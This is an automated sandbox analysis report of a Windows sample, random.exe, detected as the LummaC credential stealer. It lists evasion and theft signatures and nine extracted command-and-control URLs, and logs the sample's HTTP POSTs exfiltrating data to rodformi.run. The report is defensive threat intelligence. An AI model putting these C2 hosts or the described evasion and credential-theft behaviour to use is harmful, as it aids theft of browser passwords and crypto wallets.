
Windows Analysis Report
random.exe

Overview

General Information

Sample name: random.exe
Analysis ID: 1654467
MD5: 7ddd1b8a415abf939fff535a63d55852
SHA1: 002af611d08da05678b2ffa2e71f35301c686d39
SHA256: 1afecee6b536d098ca5d3a7d594b200f7a2126349de4cad9ff0be2b78dba9e68
Tags: exe user-abuse_ch

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • random.exe (PID: 6208 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 7DDD1B8A415ABF939FFF535A63D55852)
  • cleanup
{
  "C2 url": [
    "rodformi.run/aUosoz",
    "metalsyo.digital/opsa",
    "ironloxp.live/aksdd",
    "navstarx.shop/FoaJSi",
    "starcloc.bet/GOksAo",
    "advennture.top/GKsiio",
    "targett.top/dsANGt",
    "spacedbv.world/EKdlsk",
    "galxnetb.today/GsuIAo"
  ],
  "Build id": "60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777"
}
Yara matches

Source | Rule | Description | Author | Strings
00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-02T11:33:22.423321+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49681 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:24.103861+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49682 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:25.611142+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49683 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:26.746905+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49684 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:28.649049+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49685 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:29.859098+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49686 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:31.717847+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49687 | 172.67.197.67 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-02T11:33:22.423321+0200 | 2061214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49681 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:24.103861+0200 | 2061214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49682 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:25.611142+0200 | 2061214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49683 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:26.746905+0200 | 2061214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49684 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:28.649049+0200 | 2061214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49685 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:29.859098+0200 | 2061214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49686 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:31.717847+0200 | 2061214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49687 | 172.67.197.67 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-02T11:33:22.078124+0200 | 2061213 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 61553 | 1.1.1.1 | 53 | UDP


      AV Detection

Source: random.exe | Avira: detected
Source: https://rodformi.run/aUosozc | Avira URL Cloud: Label: malware
Source: https://rodformi.run:443/aUosozages | Avira URL Cloud: Label: malware
Source: https://rodformi.run/cV | Avira URL Cloud: Label: malware
Source: https://rodformi.run/4 | Avira URL Cloud: Label: malware
Source: https://rodformi.run/d | Avira URL Cloud: Label: malware
Source: https://rodformi.run:443/aUosoz | Avira URL Cloud: Label: malware
Source: https://rodformi.run/1 | Avira URL Cloud: Label: malware
Source: https://rodformi.run:443/aUosozc | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["rodformi.run/aUosoz", "metalsyo.digital/opsa", "ironloxp.live/aksdd", "navstarx.shop/FoaJSi", "starcloc.bet/GOksAo", "advennture.top/GKsiio", "targett.top/dsANGt", "spacedbv.world/EKdlsk", "galxnetb.today/GsuIAo"], "Build id": "60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777"}
Source: random.exe | Virustotal: Detection: 60%
Source: random.exe | ReversingLabs: Detection: 69%
Source: Submitted Sample | Neural Call Log Analysis: 81.3%
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rodformi.run/aUosoz
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: metalsyo.digital/opsa
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: ironloxp.live/aksdd
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navstarx.shop/FoaJSi
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: starcloc.bet/GOksAo
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: advennture.top/GKsiio
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: targett.top/dsANGt
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: spacedbv.world/EKdlsk
Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: galxnetb.today/GsuIAo
Source: random.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49682 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49683 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49684 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49685 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49686 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49687 version: TLS 1.2

      Networking

Source: Network traffic | Suricata IDS: 2061213 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rodformi .run) : 192.168.2.10:61553 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49684 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49687 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49682 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49686 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49683 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49681 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49685 -> 172.67.197.67:443
Source: Malware configuration extractor | URLs: rodformi.run/aUosoz
Source: Malware configuration extractor | URLs: metalsyo.digital/opsa
Source: Malware configuration extractor | URLs: ironloxp.live/aksdd
Source: Malware configuration extractor | URLs: navstarx.shop/FoaJSi
Source: Malware configuration extractor | URLs: starcloc.bet/GOksAo
Source: Malware configuration extractor | URLs: advennture.top/GKsiio
Source: Malware configuration extractor | URLs: targett.top/dsANGt
Source: Malware configuration extractor | URLs: spacedbv.world/EKdlsk
Source: Malware configuration extractor | URLs: galxnetb.today/GsuIAo
Source: Joe Sandbox View | IP Address: 172.67.197.67
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49684 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49687 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49682 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49686 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49683 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49681 -> 172.67.197.67:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49685 -> 172.67.197.67:443
Source: global traffic | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 65 | Host: rodformi.run
Source: global traffic | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=MYI1hYv5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 14903 | Host: rodformi.run
Source: global traffic | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UG43df94ljvlU3YQz | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 15075 | Host: rodformi.run
Source: global traffic | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=MG2zEvW86fpUbh578x | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 20444 | Host: rodformi.run
Source: global traffic | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6vE51zQQh0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 2556 | Host: rodformi.run
Source: global traffic | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=zKMWnlQnU1r08E6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 550482 | Host: rodformi.run
Source: global traffic | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 103 | Host: rodformi.run
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: rodformi.run
Source: global traffic | DNS traffic detected: DNS query: c.pki.goog
Source: unknown | HTTP traffic detected: POST /aUosoz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 65 | Host: rodformi.run
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
Source: random.exe, random.exe, 00000000.00000003.1061957964.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run/
Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run/1
Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run/4
Source: random.exe, 00000000.00000003.1094165011.00000000017E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run/aUosoz
Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run/aUosozc
Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run/cV
Source: random.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run/d
Source: random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run:443/aUosoz
Source: random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run:443/aUosozages
Source: random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1112992476.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rodformi.run:443/aUosozc
Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49682 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49683 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49684 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49685 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49686 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49687 version: TLS 1.2

      System Summary

Source: random.exe | Static PE information: section name:
Source: random.exe | Static PE information: section name: .idata
Source: random.exe | Static PE information: section name:
Source: random.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random.exe | Static PE information: Section: ZLIB complexity 0.9984926970108695
Source: random.exe | Static PE information: Section: zqekczog ZLIB complexity 0.994402600329957
Source: random.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random.exe | Binary or memory string: .Vbp86
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\random.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: random.exe, 00000000.00000003.1066090050.0000000005FBD000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1081673422.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1079634823.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1066382164.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: random.exe | Virustotal: Detection: 60%
Source: random.exe | ReversingLabs: Detection: 69%
Source: C:\Users\user\Desktop\random.exe | File read: C:\Users\user\Desktop\random.exe
Source: C:\Users\user\Desktop\random.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: ntasn1.dll
